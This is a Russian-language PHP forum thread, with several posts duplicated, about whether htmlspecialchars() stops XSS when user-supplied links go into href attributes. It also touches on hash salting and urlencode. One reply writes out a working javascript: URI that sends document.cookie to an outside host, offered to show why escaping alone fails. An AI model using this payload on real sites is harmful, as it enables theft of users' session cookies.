верно?
Спустя 2 минуты, 55 секунд (28.06.2010 - 10:07) twin написал(а):
Нет.
Спустя 1 минута, 17 секунд (28.06.2010 - 10:08) артем23 написал(а):
пожалуйста, поясните
вывод в браузер допустим такой строки
$url берется от пользователя
вывод в браузер допустим такой строки
<a href="htmlcpacialchars($url, ENT_QUOTES)"></a>
$url берется от пользователя
Спустя 12 минут, 57 секунд (28.06.2010 - 10:21) Basili4 написал(а):
| Цитата (артем23 @ 28.06.2010 - 11:04) |
| от кавычек и соответственно xs |
допущение ввода ковычек это не еще не возможность атаки вот Я пишу " и ' и ничего
ps а чем вам не гадила ссылка через ридерект её и волшебные слова типа javasript: рубите.
Спустя 2 минуты, 21 секунда (28.06.2010 - 10:23) артем23 написал(а):
А если написать href = "www.site.ru?url='какой нить селект запрос или редирект на сайт приемник паролей'" Это возможно?
Спустя 1 минута, 51 секунда (28.06.2010 - 10:25) twin написал(а):
Вопрос некорректен.
Защитой от любых видов атак (xss в частности) - это правильная работа с данными, полученными извне.
Нельзя обойтись одной только функцией htmlspecialchars(), и уж тем паче нельзя объявить её как
Защитой от любых видов атак (xss в частности) - это правильная работа с данными, полученными извне.
Нельзя обойтись одной только функцией htmlspecialchars(), и уж тем паче нельзя объявить её как
| Цитата |
| Самый нормальный и единственный способ экранирования |
Для начала - она ничего не экранирует. Экранирование - это добавление к символу другого спецсимвола( обратный слэш).
А дальше нужно смотреть по условиям задачи.
Одно совершенно определенно. Нет панацеи и универсального решения, которое помогло бы забыть о безопасности раз и навсегда. Вместо поисков такового лучше заняться изучением основ корректной работы с данными.
Спустя 4 минуты, 42 секунды (28.06.2010 - 10:30) Basili4 написал(а):
ну и будет там select кто его исполнять будет я надеюсь вы не передаете на вашем сайте запросы параметрами.
Спустя 1 минута, 26 секунд (28.06.2010 - 10:31) артем23 написал(а):
Basili4 )))))) смешно ,конечно
Ладно, про селект это я так, а как насчет хеш атаки
Ладно, про селект это я так, а как насчет хеш атаки
Спустя 5 минут, 41 секунда (28.06.2010 - 10:37) артем23 написал(а):
| Цитата (twin @ 28.06.2010 - 07:25) | ||
| Вопрос некорректен. Защитой от любых видов атак (xss в частности) - это правильная работа с данными, полученными извне. Нельзя обойтись одной только функцией htmlspecialchars(), и уж тем паче нельзя объявить её как
Для начала - она ничего не экранирует. Экранирование - это добавление к символу другого спецсимвола( обратный слэш). А дальше нужно смотреть по условиям задачи. Одно совершенно определенно. Нет панацеи и универсального решения, которое помогло бы забыть о безопасности раз и навсегда. Вместо поисков такового лучше заняться изучением основ корректной работы с данными. |
а вот такие рассуждения неверны?
Вот пришла нам из формы переменная на скрипт, образовалась страничка с этой переменной. И если сидит в href "адрес с хакерским ресурсом". Если бы мы экранировали эту переменную, ничего бы и не произошло
Задача ссужена и конкретизирована, какие шаги и решения на Ваш взгляд?
Спустя 1 минута, 33 секунды (28.06.2010 - 10:39) Basili4 написал(а):
| Цитата (артем23 @ 28.06.2010 - 11:31) |
| хеш атаки |
это всмысле воровства кук ????? воровство прочветает чтобы куки с вашего сайта не утащили есть несколько способов точнее параметров при сбросе кук. атрибут Secure например.
а еще вот тут можно почитать http://msdn.microsoft.com/en-us/library/ms533046.aspx
Спустя 2 минуты, 16 секунд (28.06.2010 - 10:41) артем23 написал(а):
почему только кук. обычные хеш атаки, коих много
Спустя 11 минут, 57 секунд (28.06.2010 - 10:53) Basili4 написал(а):
давайте определимся с терменологией под хеш атакой вы подразумеваете подбор пораоля имея его хеш. Так ?. Существет достаточно простой механизм знизить возможность такой атаки. добавление набора символов в количестве 20 шт. не в канец пароля а скажем путем не сложного перемешивания. даже если и и кто подберет к хешу последовательность символом то тут еще встанет вопрос какие из символов есть пароль вот и все.
Спустя 3 минуты, 41 секунда (28.06.2010 - 10:56) артем23 написал(а):
с хеш разобрались, а как насчет xss атак?
и тот же вопрос )
а вот такие рассуждения неверны?
Вот пришла нам из формы переменная на скрипт, образовалась страничка с этой переменной. И если сидит в href "адрес с хакерским ресурсом". Если бы мы экранировали эту переменную, ничего бы и не произошло
Задача ссужена и конкретизирована, какие шаги и решения на Ваш взгляд?
и тот же вопрос )
а вот такие рассуждения неверны?
Вот пришла нам из формы переменная на скрипт, образовалась страничка с этой переменной. И если сидит в href "адрес с хакерским ресурсом". Если бы мы экранировали эту переменную, ничего бы и не произошло
Задача ссужена и конкретизирована, какие шаги и решения на Ваш взгляд?
Спустя 1 час, 2 минуты, 56 секунд (28.06.2010 - 11:59) twin написал(а):
Во первых, прежде чем образовалась страничка с переменной, должен отработать скрипт. То есть он должен (обязан) работать с этой переменной (иначе для чего она). Так вот правильная обработка в зависимости от поставленной задачи и есть основа безопасности.
| Цитата |
| Задача ссужена и конкретизирована, какие шаги и решения на Ваш взгляд? |
Вовсе нет. Ничего тут не конкретизировано. Откуда и как эти данные попали в href ссылки? И чем тут поможет так называемое "экранирование"? (когда же научитесь называть вещи своими именами...)
Если это допустим из bb-редактора, то запостив туда такой текст
javascript: location.href='http://sniffer.ch?c='+encodeURIComponent(document.cookie) жулик стащит все куки и никакое "экранирование" не поможет. Попробуй. Тут нужно обязательно добавлять протокол.
И так в каждом конкретном случае.
Спустя 20 часов, 46 минут, 9 секунд (29.06.2010 - 08:46) Kuzya написал(а):
Эх жаль я в выходные сюда не заглядывал 
Полностью согласен с twin. Любая защита от любых атак инъективной группы (XSS, CRLF-inj, SQL-inj, XPath-inj и т.д.) должна быть ориентирована на конкретную ситуацию, и каких-то уникальный решений тут нет.
Полностью согласен с twin. Любая защита от любых атак инъективной группы (XSS, CRLF-inj, SQL-inj, XPath-inj и т.д.) должна быть ориентирована на конкретную ситуацию, и каких-то уникальный решений тут нет.
Спустя 2 года, 22 дня, 2 часа, 22 минуты, 5 секунд (21.07.2012 - 11:08) Гость_alexblade написал(а):
стоп стоп товарищи. экранирование html и экранирование ссылок это разные вещи.
htmlspecialchars для хтмл нужен а не для ссылок
а вот подскажите для ссылок что нужно ? у меня в данных передаваемых через ссылки есть & который обрабатывается соответсвующим образом (как разделитель переменых) а не должен. как мне это экранировать или что с этим делать ?
htmlspecialchars для хтмл нужен а не для ссылок
а вот подскажите для ссылок что нужно ? у меня в данных передаваемых через ссылки есть & который обрабатывается соответсвующим образом (как разделитель переменых) а не должен. как мне это экранировать или что с этим делать ?
Спустя 2 дня, 1 час, 57 минут, 39 секунд (23.07.2012 - 13:05) alexblade написал(а):
urlencode вроде подходит